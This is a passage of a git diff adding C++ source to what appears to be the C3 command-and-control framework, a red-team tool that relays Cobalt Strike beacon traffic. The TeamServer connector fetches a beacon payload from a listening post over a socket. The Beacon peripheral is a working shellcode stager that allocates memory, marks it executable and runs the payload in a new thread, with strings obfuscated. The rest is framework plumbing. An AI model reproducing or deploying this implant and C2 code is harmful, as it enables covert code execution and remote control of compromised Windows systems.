WSAStartup(wVersionRequested, &wsaData); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +bool MWR::C3::Interfaces::Connectors::TeamServer::DeinitializeSockets() +{ + return WSACleanup() == 0; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Connectors::TeamServer::GeneratePayload(ByteView binderId, std::string pipename, bool arch64, uint32_t block) +{ + if (binderId.empty() || pipename.empty()) + throw std::runtime_error{OBF("Wrong parameters, cannot create payload")}; + + auto connection = std::make_unique( m_ListeningPostAddress, m_ListeningPostPort, std::static_pointer_cast(shared_from_this()), binderId); + connection->Send(ByteView{ OBF_STR("arch=") + (arch64 ? OBF("x64") : OBF("x86")) }); + connection->Send(ByteView{ OBF("pipename=") + pipename }); + connection->Send(ByteView{ OBF("block=") + std::to_string(block) }); + connection->Send(ByteView{ OBF("go") }); + auto payload = connection->Receive(); + m_ConnectionMap.emplace(std::string{ binderId }, std::move(connection)); + return payload; +} + +////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +//MWR::ByteVector MWR::C3::Interfaces::Connectors::TeamServer::GeneratePayload(ByteView arguments) +//{ +// auto [pipename, arch64, block] = arguments.Read(); +// return GeneratePayload(pipename, arch64, block); +//} + +MWR::ByteVector MWR::C3::Interfaces::Connectors::TeamServer::CloseConnection(ByteView arguments) +{ + auto id = arguments.Read(); + m_ConnectionMap.erase(id); + return {}; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Connectors::TeamServer::OnRunCommand(ByteView command) +{ + auto commandCopy = command; + switch (command.Read()) + { +// case 0: +// return GeneratePayload(command); + case 1: + return CloseConnection(command); + default: + return AbstractConnector::OnRunCommand(commandCopy); + } +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView MWR::C3::Interfaces::Connectors::TeamServer::GetCapability() +{ + return R"( +{ + "create": + { + "arguments": + [ + { + "type": "ip", + "name": "Address", + "description": "Listening post address" + }, + { + "type": "uint16", + "name": "Port", + "min": 1, + "description": "Listening post port" + } + ] + }, + "commands": + [ + { + "name": "Close connection", + "description": "Close socket connection with TeamServer if beacon is not available", + "id": 1, + "arguments": + [ + { + "name": "Route Id", + "min": 1, + "description": "Id associated to beacon" + } + ] + } + ] +} +)"; +} + +//{ +// "name": "Generate payload", +// "description" : "Create new payload with custom parameters", +// "id" : 0, +// "arguments" : +// [ +// { +// "name": "Pipename", +// "randomize" : true, +// "description" : "Name of pipe used by beacon on target machine. Prefix is not required" +// }, +// { +// "name": "x64", +// "type" : "boolean", +// "description" : "Specifies if payload should be x64 or x86 architecture" +// }, +// { +// "name": "Block time", +// "type" : "uint32", +// "description" : "A time in milliseconds that indicates how long the server should block when no new tasks are available" +// } +// ] +//}, + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Connectors::TeamServer::Connection::Connection(std::string_view listeningPostAddress, uint16_t listeningPostPort, std::weak_ptr owner, std::string_view id) + : m_Owner(owner) + , m_Id(ByteView{ id }) +{ + sockaddr_in client; + client.sin_family = AF_INET; + client.sin_port = htons(listeningPostPort); + switch (InetPtonA(AF_INET, &listeningPostAddress.front(), &client.sin_addr.s_addr)) //< Mod to solve deprecation issue. + { + case 0: + throw std::invalid_argument(OBF("Provided Listening Post address in not a valid IPv4 dotted - decimal string or a valid IPv6 address.")); + case -1: + throw MWR::SocketsException(OBF("Couldn't convert standard text IPv4 or IPv6 address into its numeric binary form. Error code : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); + } + + // Attempt to connect. + if (INVALID_SOCKET == (m_Socket = socket(AF_INET, SOCK_STREAM, 0))) + throw MWR::SocketsException(OBF("Couldn't create socket."), WSAGetLastError()); + + if (SOCKET_ERROR == connect(m_Socket, (struct sockaddr*) & client, sizeof(client))) + throw MWR::SocketsException(OBF("Could not connect to ") + std::string{ listeningPostAddress } + OBF(":") + std::to_string(listeningPostPort) + OBF("."), WSAGetLastError()); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Connectors::TeamServer::Connection::~Connection() +{ + closesocket(m_Socket); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Interfaces::Connectors::TeamServer::Connection::Send(ByteView data) +{ + auto owner = m_Owner.lock(); + if (!owner) + throw std::runtime_error(OBF("Could not lock pointer to owner ")); + + std::unique_lock lock{ owner->m_SendMutex }; + // Write four bytes indicating the length of the next chunk of data. + DWORD chunkLength = static_cast(data.size()), bytesWritten = 0; + if (SOCKET_ERROR == send(m_Socket, reinterpret_cast(&chunkLength), 4, 0)) + throw MWR::SocketsException(OBF("Error sending to Socket : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); + + // Write the chunk to socket. + if (SOCKET_ERROR == send(m_Socket, reinterpret_cast(&data.front()), static_cast(chunkLength), 0)) + throw MWR::SocketsException(OBF("Error sending to Socket : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Connectors::TeamServer::Connection::Receive() +{ + DWORD chunkLength = 0, bytesRead; + if (SOCKET_ERROR == (bytesRead = recv(m_Socket, reinterpret_cast(&chunkLength), 4, 0))) + throw MWR::SocketsException(OBF("Error receiving from Socket : ") + std::to_string(WSAGetLastError()) + ("."), WSAGetLastError()); + + if (!bytesRead || !chunkLength) + return {}; //< The connection has been gracefully closed. + + // Read in the result. + ByteVector buffer; + buffer.resize(chunkLength); + for (DWORD bytesReadTotal = 0; bytesReadTotal < chunkLength; bytesReadTotal += bytesRead) + switch (bytesRead = recv(m_Socket, reinterpret_cast(&buffer[bytesReadTotal]), chunkLength - bytesReadTotal, 0)) + { + case 0: + return {}; //< The connection has been gracefully closed. + + case SOCKET_ERROR: + throw MWR::SocketsException(OBF("Error receiving from Socket : ") + std::to_string(WSAGetLastError()) + OBF("."), WSAGetLastError()); + } + + return buffer; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Interfaces::Connectors::TeamServer::Connection::StartUpdatingInSeparateThread() +{ + m_SecondThreadStarted = true; + std::thread([&]() + { + // Lock pointers. + auto owner = m_Owner.lock(); + auto bridge = owner->GetBridge(); + while (bridge->IsAlive()) + { + try + { + // Read packet and post it to Binder. + if (auto packet = Receive(); !packet.empty()) + { + if (packet.size() == 1u && packet[0] == 0u) + Send(packet); + else + bridge->PostCommandToBinder(ByteView{ m_Id }, packet); + } + } + catch (std::exception& e) + { + bridge->Log({ e.what(), LogMessage::Severity::Error}); + } + } + }).detach(); +} + +bool MWR::C3::Interfaces::Connectors::TeamServer::Connection::SecondThreadStarted() +{ + return m_SecondThreadStarted; +} + +MWR::ByteVector MWR::C3::Interfaces::Connectors::TeamServer::PeripheralCreationCommand(ByteView connectionId, ByteView data, bool isX64) +{ + auto [pipeName, maxConnectionTrials, delayBetweenConnectionTrials/*, payload*/] = data.Read(); + + // custom payload is removed from release. + //if (!payload.empty()) + //{ + // return data; + //} + + return ByteVector{}.Write(pipeName,maxConnectionTrials, delayBetweenConnectionTrials, GeneratePayload(connectionId, pipeName, isX64, 100u)); +} diff --git a/Src/Common/MWR/C3/Interfaces/Peripherals/Beacon.cpp b/Src/Common/MWR/C3/Interfaces/Peripherals/Beacon.cpp new file mode 100644 index 0000000..16c6bbd --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Peripherals/Beacon.cpp @@ -0,0 +1,146 @@ +#include "StdAfx.h" +#include "Beacon.h" + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Peripherals::Beacon::Beacon(ByteView arguments) +{ + auto [pipeName, maxConnectionTrials, delayBetweenConnectionTrials, payload] = arguments.Read(); + + // Arguments validation. + if (payload.empty()) + throw std::invalid_argument(OBF("There was no payload provided.")); + + if (pipeName.empty() || !maxConnectionTrials) + throw std::invalid_argument(OBF("Cannot establish connection with payload with provided parameters")); + + // Create an R/W region of pages in the virtual address space of current process. + auto codePointer = static_cast(VirtualAlloc(0, payload.size(), MEM_COMMIT, PAGE_READWRITE)); + if (!codePointer) + throw std::runtime_error{ OBF("Couldn't allocate R/W virtual memory: ") + std::to_string(GetLastError()) + OBF(".") }; + + // Copy payload to the newly allocated region. + memcpy_s(codePointer, payload.size(), payload.data(), payload.size()); + + DWORD prev; + //Now mark the memory region R/X + if (!VirtualProtect(codePointer, payload.size(), PAGE_EXECUTE_READ, &prev)) + throw std::runtime_error(OBF("Couldn't mark virtual memory as R/X. ") + std::to_string(GetLastError())); + + namespace SEH = MWR::WinTools::StructuredExceptionHandling; + // use explicit type to bypass overload resolution + DWORD(WINAPI * sehWrapper)(SEH::CodePointer) = SEH::SehWrapper; + // Inject the payload stage into the current process. + if (!CreateThread(NULL, 0, reinterpret_cast(sehWrapper), codePointer, 0, nullptr)) + throw std::runtime_error{ OBF("Couldn't run payload: ") + std::to_string(GetLastError()) + OBF(".") }; + + std::this_thread::sleep_for(std::chrono::milliseconds{ 30 }); // Give beacon thread time to start pipe. + + // Connect to our Beacon named Pipe. + for (uint16_t connectionTrial = 0u; connectionTrial < maxConnectionTrials; ++connectionTrial) + try + { + m_Pipe = WinTools::AlternatingPipe{ ByteView{ pipeName } }; + return; + } + catch (std::exception& e) + { + // Sleep between trials. + Log({ OBF_SEC("Beacon constructor: ") + e.what(), LogMessage::Severity::DebugInformation }); + std::this_thread::sleep_for(std::chrono::milliseconds{ delayBetweenConnectionTrials }); + } + + // Throw a time-out exception. + throw std::runtime_error{OBF("Beacon creation failed")}; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Interfaces::Peripherals::Beacon::OnCommandFromConnector(ByteView data) +{ + // Get access to write when whole reed is done. + std::unique_lock lock{ m_Mutex }; + m_ConditionalVariable.wait(lock, [this]() { return !m_ReadingState; }); + + // Write + m_Pipe->Write(data); + + // Unlock, and block writing until read is done. + m_ReadingState = true; + lock.unlock(); + m_ConditionalVariable.notify_one(); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Peripherals::Beacon::OnReceiveFromPeripheral() +{ + // Get Access to reed after normal write. + std::unique_lock lock{ m_Mutex }; + m_ConditionalVariable.wait(lock, [this]() { return m_ReadingState; }); + + // Read + auto ret = m_Pipe->Read(); + + if (IsNoOp(ret)) + { + // Unlock, and block reading until write is done. + m_ReadingState = false; + lock.unlock(); + m_ConditionalVariable.notify_one(); + } + else + { + // Continue in read mode. Send no-op to beacon to get next chunk of data. + m_Pipe->Write("\0"_bv); + } + + return ret; +} + +bool MWR::C3::Interfaces::Peripherals::Beacon::IsNoOp(ByteView data) +{ + return data.size() == 1 && data[0] == 0u; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView MWR::C3::Interfaces::Peripherals::Beacon::GetCapability() +{ + return R"( +{ + "create": + { + "arguments": + [ + { + "type": "string", + "name": "Pipe name", + "min": 4, + "randomize": true, + "description": "Name of the pipe Beacon uses for communication." + }, + { + "type": "int16", + "min": 1, + "defaultValue" : 10, + "name": "Connection trials", + "description": "Number of connection trials before marking whole staging process unsuccessful." + }, + { + "type": "int16", + "min": 30, + "defaultValue" : 1000, + "name": "Trials delay", + "description": "Time in milliseconds to wait between unsuccessful connection trails." + } + ] + }, + "commands": [] +} +)"; +} + +// Custom payload is removed from release. +// , +// { +// "type": "binary", +// "name" : "Payload", +// "description" : "Implant to inject. Leave empty to generate payload." +// } diff --git a/Src/Common/MWR/C3/Interfaces/Peripherals/Beacon.h b/Src/Common/MWR/C3/Interfaces/Peripherals/Beacon.h new file mode 100644 index 0000000..c37d4c9 --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Peripherals/Beacon.h @@ -0,0 +1,52 @@ +#pragma once + +#include +#include "Common/MWR/WinTools/Pipe.h" + +/// Forward declaration of Connector associated with implant. +/// Connectors implementation is only available on GateRelay, not NodeRelays. +/// Declaration must be identical to Connector definition. Namespace or struct/class mismatch will make Peripheral unusable. +namespace MWR::C3::Interfaces::Connectors { struct TeamServer; } + +namespace MWR::C3::Interfaces::Peripherals +{ + /// Class representing Beacon stager. + struct Beacon : public Peripheral + { + public: + /// Public constructor. + /// @param arguments view of arguments prepared by Connector. + Beacon(ByteView arguments); + + /// Sending callback implementation. + /// @param packet to send to the Implant. + void OnCommandFromConnector(ByteView packet) override; + + /// Callback that handles receiving from the outside of the C3 network (Cobalt Strike Beacon). + /// @returns ByteVector data received from beacon. + ByteVector OnReceiveFromPeripheral() override; + + /// Return json with commands. + /// @return ByteView Commands description in JSON format. + static ByteView GetCapability(); + + private: + /// Check if data is no-op. + /// @return true if data is no-op, false otherwise. + static bool IsNoOp(ByteView data); + + /// Object used to communicate with beacon. + /// Optional is used to perform many trails of staging in constructor. + /// Must contain object if constructor call was successful. + std::optional m_Pipe; + + /// Used to synchronize access to underlying implant. + std::mutex m_Mutex; + + /// Used to synchronize read/write. + std::condition_variable m_ConditionalVariable; + + /// Used to support beacon chunking data. + bool m_ReadingState = true; + }; +} \ No newline at end of file diff --git a/Src/Common/MWR/C3/Interfaces/Peripherals/Mock.cpp b/Src/Common/MWR/C3/Interfaces/Peripherals/Mock.cpp new file mode 100644 index 0000000..a715cfe --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Peripherals/Mock.cpp @@ -0,0 +1,76 @@ +#include "StdAfx.h" +#include "Mock.h" + +#ifdef _DEBUG + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::C3::Interfaces::Peripherals::Mock::Mock(ByteView) + : m_NextMessageTime{ std::chrono::high_resolution_clock::now() } +{ + +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::Interfaces::Peripherals::Mock::OnCommandFromConnector(ByteView packet) +{ + // Construct a copy of received packet trimmed to 10 characters and add log it. + Log({ OBF("Mock received: ") + std::string{ packet.begin(), packet.size() < 10 ? packet.end() : packet.begin() + 10 } + OBF("..."), LogMessage::Severity::DebugInformation }); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteVector MWR::C3::Interfaces::Peripherals::Mock::OnReceiveFromPeripheral() +{ + // Send heart beat every 5s. + if (m_NextMessageTime > std::chrono::high_resolution_clock::now()) + return {}; + + m_NextMessageTime = std::chrono::high_resolution_clock::now() + 5s; + return ByteView{ OBF("Beep") }; +} + +MWR::ByteVector MWR::C3::Interfaces::Peripherals::Mock::OnRunCommand(ByteView command) +{ + auto commandCopy = command; + switch (command.Read()) + { + case 0: + return TestErrorCommand(command); + default: + return AbstractPeripheral::OnRunCommand(commandCopy); + } +} + +MWR::ByteVector MWR::C3::Interfaces::Peripherals::Mock::TestErrorCommand(ByteView arg) +{ + GetBridge()->SetErrorStatus(arg.Read()); + return {}; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +MWR::ByteView MWR::C3::Interfaces::Peripherals::Mock::GetCapability() +{ + return R"( +{ + "create": + { + "arguments":[] + }, + "commands": + [ + { + "name": "Test command", + "description": "Set error on connector.", + "id": 0, + "arguments": + [ + { + "name": "Error message", + "description": "Error set on connector. Send empty to clean up error" + } + ] + } + ] +} +)"; +} +#endif // _DEBUG diff --git a/Src/Common/MWR/C3/Interfaces/Peripherals/Mock.h b/Src/Common/MWR/C3/Interfaces/Peripherals/Mock.h new file mode 100644 index 0000000..5684e4f --- /dev/null +++ b/Src/Common/MWR/C3/Interfaces/Peripherals/Mock.h @@ -0,0 +1,47 @@ +#pragma once + +#ifdef _DEBUG + +/// Forward declaration of Connector associated with implant. +/// Connectors implementation is only available on GateRelay, not NodeRelays. +/// Declaration must be identical to Connector definition. Namespace or struct/class mismatch will make Peripheral unusable. +namespace MWR::C3::Interfaces::Connectors { class MockServer; } + +namespace MWR::C3::Interfaces::Peripherals +{ + /// Class representing mock implant. + class Mock : public Peripheral + { + public: + /// Public Constructor. + /// @param ByteView unused. + Mock(ByteView); + + /// Sending callback implementation. + /// @param packet to send to the Implant. + void OnCommandFromConnector(ByteView packet) override; + + /// Callback that handles receiving from the Mock. + /// @returns ByteVector data received. + ByteVector OnReceiveFromPeripheral() override; + + /// Return json with commands. + /// @return ByteView Commands description in JSON format. + static ByteView GetCapability(); + + /// Processes internal (C3 API) Command. + /// @param command a buffer containing whole command and it's parameters. + /// @return ByteVector command result. + ByteVector OnRunCommand(ByteView command) override; + + private: + /// Example of internal command of peripheral. Must be described in GetCapability, and handled in OnRunCommand + /// @param arg all arguments send to method. + /// @returns ByteVector response for command. + ByteVector TestErrorCommand(ByteView arg); + + /// Used to delay receiving data from mock implementaion. + std::chrono::time_point m_NextMessageTime; + }; +} +#endif // _DEBUG diff --git a/Src/Common/MWR/C3/Internals/AutomaticRegistrator.h b/Src/Common/MWR/C3/Internals/AutomaticRegistrator.h new file mode 100644 index 0000000..ef0e42e --- /dev/null +++ b/Src/Common/MWR/C3/Internals/AutomaticRegistrator.h @@ -0,0 +1,159 @@ +#pragma once + +#include "Common/MWR/CppTools/Hash.h" +#include "InterfaceFactory.h" +#include "Interface.h" + +namespace MWR::C3 +{ + + /// Template class handling registration of Interface before main function. + /// @tparam Iface. Interface to be registered. + template + struct Register : AbstractType + { + Register() + { + // Addressing variable in constructor prevents compiler from skipping template instantiation, because of possible side effects. + static_cast(m_Registered); + static_cast(s_InterfaceHash); + } + + /// Main function responsible for registration of interface. + /// Return value of function is used to initialize static variable assuring execution of code before main. + /// @returns true. + static bool Init() + { + static_assert(std::is_constructible_v, "Channel does not declare constructor from ByteView."); + return InterfaceFactory::Instance().Register(Iface::s_InterfaceHash, CreateInterfaceData()); + } + + private: + template + class EnsureDefaultCapability + { + template static uint8_t Test(decltype(T2::GetCapability)*); + template static uint16_t Test(...); + + public: + static constexpr bool HasCustomCapability = (sizeof(Test(nullptr)) == sizeof(uint8_t)); + template + static std::string GetCapability(); + + template <> + static std::string GetCapability() + { + return R"_( +{ + "create": + { + "arguments": + [ + { + "type": "binary", + "description": "Blob of data that will be provided to Channel constructor.", + "name": "arguments" + } + ] + }, + "commands": [] +})_"; + } + + template <> + static std::string GetCapability() + { + return T::GetCapability(); + } + }; + + /// Create object of InterfaceData to be stored. + static InterfaceFactory::InterfaceData CreateInterfaceData() + { + InterfaceFactory::InterfaceData ret; + ret.m_Builder = [](ByteView bv) { return std::shared_ptr{ new Iface{ bv } }; }; + ret.m_ClousureConnectorHash = clousureConnectorHash; + ret.m_StartupJitter = std::pair(Iface::s_MinUpdateFrequency, Iface::s_MaxUpdateFrequency); +#ifdef C3_IS_GATEWAY + ret.m_Name = GetInterfaceName(); + ret.m_Capability = EnsureDefaultCapability::GetCapability::HasCustomCapability>(); // Simpler syntax should be available, but I've encountered MSVC bug with SFINAE. +#endif //C3_IS_GATEWAY + + return ret; + } + + private: + /// Static hash of Interface. + static const HashT s_InterfaceHash; + + /// Optimization member. + /// Due to linking dependencies (when code is used to generate .lib file) Init() function must be called on static non-member variable in header file. + /// Each compilation unit will use Init() separetly, but thanks to m_Registered only one will result in performing actual logic. + static bool m_Registered; + }; + + /// Initialization of Register::m_Registered. + template + bool Register::m_Registered = Register::Init(); + + // Hash is calculated at compile time, compiler correctly notes multiple overflow, but it is valid operation for unsigned type and is used as modulo. +#pragma warning( push ) +#pragma warning( disable : 4307) + /// Initialization of Register::s_InterfaceHash. + template + constexpr HashT Register::s_InterfaceHash = Hash::Fnv1aType(); +#pragma warning( pop ) + + /// Specialization of Registration mechanism for Channel type Interface. + template + class Channel : public Register + { + public: + constexpr static std::chrono::milliseconds s_MinUpdateFrequency = 30ms; + constexpr static std::chrono::milliseconds s_MaxUpdateFrequency = 30ms; + + Channel() + { + static_assert(Iface::s_MinUpdateFrequency >= 30ms && Iface::s_MinUpdateFrequency <= Iface::s_MaxUpdateFrequency, "The frequency is set incorrectly"); + m_MinUpdateFrequency = Iface::s_MinUpdateFrequency; + m_MaxUpdateFrequency = Iface::s_MaxUpdateFrequency; + } + }; + +#ifdef C3_IS_GATEWAY + /// Specialization of Registration mechanism for Connector type Interface. + template + class Connector : public Register + { + public: + // connector in fact does not need those values. They are here to satisfy template requirements. + constexpr static std::chrono::milliseconds s_MinUpdateFrequency = 0ms; + constexpr static std::chrono::milliseconds s_MaxUpdateFrequency = 0ms; + }; +#else + /// Don't register the connectors in node builds + template + class Connector : public AbstractConnector + { + }; +#endif C3_IS_GATEWAY + +#pragma warning( push ) +#pragma warning( disable : 4307) + /// Specialization of Registration mechanism for Peripheral type Interface. + template + class Peripheral : public Register()> + { + public: + constexpr static std::chrono::milliseconds s_MinUpdateFrequency = 30ms; + constexpr static std::chrono::milliseconds s_MaxUpdateFrequency = 30ms; + + Peripheral() + { + static_assert(Iface::s_MinUpdateFrequency >= 30ms && Iface::s_MinUpdateFrequency <= Iface::s_MaxUpdateFrequency, "The frequency is set incorrectly"); + m_MinUpdateFrequency = Iface::s_MinUpdateFrequency; + m_MaxUpdateFrequency = Iface::s_MaxUpdateFrequency; + } + }; +#pragma warning( pop ) +} diff --git a/Src/Common/MWR/C3/Internals/BackendCommons.h b/Src/Common/MWR/C3/Internals/BackendCommons.h new file mode 100644 index 0000000..7813522 --- /dev/null +++ b/Src/Common/MWR/C3/Internals/BackendCommons.h @@ -0,0 +1,153 @@ +#pragma once + +#include "Common/MWR/CppTools/ByteView.h" + +namespace MWR +{ + using HashT = std::uint32_t; +} + +namespace MWR::C3 +{ + //Forward declaration + class InterfaceFactory; + + /// Abstract Relay. + struct Relay + { + /// Waits for Relay to be terminated internally by a C3 API Command (e.g. from WebController). + virtual void Join() = 0; + }; + + /// An internal structure that represents a Log entry. + struct LogMessage + { + /// Enumeration type for information severity. + enum class Severity { Information, Warning, Error, DebugInformation }; + + MWR::SecureString m_Body; ///< Message's text. + Severity m_Severity; ///< Message's type. + + LogMessage(std::string_view message, Severity severity) + : m_Body{ message } + , m_Severity{ severity } + { + } + }; + + namespace Utils + { + /// Gate/Node Relay starters logger callback prototype. + using LoggerCallback = void(*)(LogMessage const&, std::string_view*); + + /// Creates a Gateway. + /// @param callbackOnLog callback fired whenever a new Log entry is being added. + /// @keysFileName path to the encryption keys file. + /// @configurationFileName path to the configuration file. + /// @param interfaceFactory reference to interface factory. + /// @return Shared Gateway object. + std::shared_ptr CreateGatewayFromConfigurationFiles(LoggerCallback callbackOnLog, InterfaceFactory& interfaceFactory, std::filesystem::path const& keysFileName, std::filesystem::path const& configurationFileName); + + /// Creates and starts a NodeRelay in a background thread. + /// @param callbackOnLog callback fired whenever a new Log entry is being added. + /// @param interfaceFactory reference to interface factory. + std::shared_ptr CreateNodeRelayFromImagePatch(LoggerCallback callbackOnLog, InterfaceFactory& interfaceFactory, ByteView buildId, ByteView gatewaySignature, ByteView broadcastKey, std::vector const& gatewayInitialPackets); + + /// Converts Relay's Log entry into single line of text, ready to be printed e.g. on console screen. + /// @param relayName name of the Relay. + /// @param message information to log. + /// @param sender ID of the Interface reporting the message. If sender.empty() then the message comes from internal Relay mechanisms. If sender is null then it comes from outside the Relay. + /// @return Constructed string. + std::string ConvertLogMessageToConsoleText(std::string_view relayName, MWR::C3::LogMessage const& message, std::string_view* sender); + } + + /// Device bridge between C3 Core and C3 Mantle. + struct AbstractDeviceBridge + { + /// Called by Relay just after the Device creation. + virtual void OnAttach() = 0; + + /// Detaches the Device. + virtual void Detach() = 0; + + /// Callback periodically fired by Relay for Device to update it's state. Might be called from a separate thread. Device should perform all necessary actions and leave as soon as possible. + virtual void OnReceive() = 0; + + /// Fired by Channel when a C3 packet arrives. + /// @param packet full C3 packet. + virtual void PassNetworkPacket(ByteView packet) = 0; + + /// Fired by Relay to pass provided C3 packet through the Channel Device. + /// @param packet full C3 packet. + virtual void OnPassNetworkPacket(ByteView packet) = 0; + + /// Called whenever Peripheral wants to send a Command to its Connector Binder. + /// @param command full Command with arguments. + virtual void PostCommandToConnector(ByteView command) = 0; + + /// Fired by Relay to pass by provided Command from Connector. + /// @param command full Command with arguments. + virtual void OnCommandFromConnector(ByteView command) = 0; + + /// Runs Device's Command. + /// @param command Device's Command to run. + /// @return Command result. + virtual ByteVector RunCommand(ByteView command) = 0; + + /// Tells Device's type name. + /// @return A buffer with Device's description. + virtual ByteVector WhoAreYou() = 0; + + /// Logs a message. Used by internal mechanisms to report errors, warnings, informations and debug messages. + /// @param message information to log. + virtual void Log(LogMessage const& message) = 0; + + /// Modifies the duration and jitter of OnReceive() calls. If minUpdateFrequencyInMs != maxUpdateFrequencyInMs then update frequency is randomized in range between those values. + /// @param minUpdateFrequencyInMs minimum update frequency. + /// @param maxUpdateFrequencyInMs maximum update frequency. + virtual void SetUpdateFrequency(std::chrono::milliseconds minUpdateFrequencyInMs, std::chrono::milliseconds maxUpdateFrequencyInMs) = 0; + + /// Sets time span between OnReceive() calls to a fixed value. + /// @param frequencyInMs frequency of OnReceive() calls. + virtual void SetUpdateFrequency(std::chrono::milliseconds frequencyInMs) = 0; + + virtual void SetErrorStatus(std::string_view errorMessage) = 0; + virtual std::string GetErrorStatus() = 0; + }; + + /// Connector bridge between C3 Core and C3 Mantle. + struct AbstractConnectorBridge + { + /// Called by Relay just after creation of the Connector. + virtual void OnAttach() = 0; + + /// Detaches the Connector. + virtual void Detach() = 0; + + /// Called whenever Connector wants to send a Command to its Peripheral Binder. + /// @param binderId Identifier of Peripheral who sends the Command. + /// @param command full Command with arguments. + virtual void PostCommandToBinder(ByteView binderId, ByteView command) = 0; + + /// Fired by Relay to pass by provided Command from Binder Peripheral. + /// @param binderId Identifier of Peripheral who sends the Command. + /// @param command full Command with arguments. + virtual void OnCommandFromBinder(ByteView binderId, ByteView command) = 0; + + /// Runs Connector's Command. + /// @param command Connector's Command to run. + /// @return Command result. + virtual ByteVector RunCommand(ByteView command) = 0; + + virtual ByteVector PeripheralCreationCommand(ByteView connectionId, ByteView data, bool isX64 = false) = 0; + + /// Logs a message. Used by internal mechanisms to report errors, warnings, informations and debug messages. + /// @param message information to log. + virtual void Log(LogMessage const& message) = 0; + + virtual bool IsAlive() const = 0; + + virtual void SetErrorStatus(std::string_view errorMessage) = 0; + virtual std::string GetErrorStatus() = 0; + }; +} diff --git a/Src/Common/MWR/C3/Internals/HasConstructor.h b/Src/Common/MWR/C3/Internals/HasConstructor.h new file mode 100644 index 0000000..67a82ad --- /dev/null +++ b/Src/Common/MWR/C3/Internals/HasConstructor.h @@ -0,0 +1,73 @@ +#pragma once + +#include + +// Probably going to be removed +namespace MWR +{ + /// Check if constructor exist. Signature of constructor is also checked. + /// Ambiguous constructor will return false. + template + class HasConstructor + { + static constexpr bool init() + { + static_assert(false, "Constructor should support 1 - 3 arguments. All other options are forbidden."); + return false; + } + public: + static const bool value = init(); + }; + + template + class HasConstructor + { + struct Any { template operator ByteArray(void); }; + + template + static uint16_t Detect(decltype(T3(std::declval(), Any{}, Any{}))*); + + template + static uint8_t Detect(...); + public: + static const bool value = sizeof(Detect(nullptr)) == sizeof(uint16_t); + }; + + template + class HasConstructor + { + struct Any { template operator ByteArray(void); }; + + template + static uint16_t Detect(decltype(T3(std::declval(), Any{}))*); + + template + static uint8_t Detect(...); + public: + static const bool value = sizeof(Detect(nullptr)) == sizeof(uint16_t); + }; + + template + class HasConstructor + { + template + static uint16_t Detect(decltype(T3(std::declval()))*); + + template + static uint8_t Detect(...); + public: + static const bool value = sizeof(Detect(nullptr)) == sizeof(uint16_t); + }; + + template + class HasConstructor + { + template + static uint16_t Detect(decltype(T3())*); + + template + static uint8_t Detect(...); + public: + static const bool value = sizeof(Detect(nullptr)) == sizeof(uint16_t); + }; +} diff --git a/Src/Common/MWR/C3/Internals/Interface.cpp b/Src/Common/MWR/C3/Internals/Interface.cpp new file mode 100644 index 0000000..f860eec --- /dev/null +++ b/Src/Common/MWR/C3/Internals/Interface.cpp @@ -0,0 +1,96 @@ +#include "StdAfx.h" +#include "Interface.h" +#include "Core/DeviceBridge.h" // TODO it would be great to remove core dependency. PTAL Close method +#include "Core/ConnectorBridge.h" +#include "Core/Relay.h" +#include "Core/GateRelay.h" + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::AbstractPeripheral::OnReceive() +{ + if (auto bridge = GetBridge(); bridge) + if (auto command = OnReceiveFromPeripheral(); !command.empty()) + bridge->PostCommandToConnector(command); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void MWR::C3::AbstractChannel::OnReceive() +{ + if (auto bridge = GetBridge(); bridge) + if (auto packet = OnReceiveFromChannel(); !packet.empty()) + bridge->PassNetworkPacket(packet); +} + +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +void 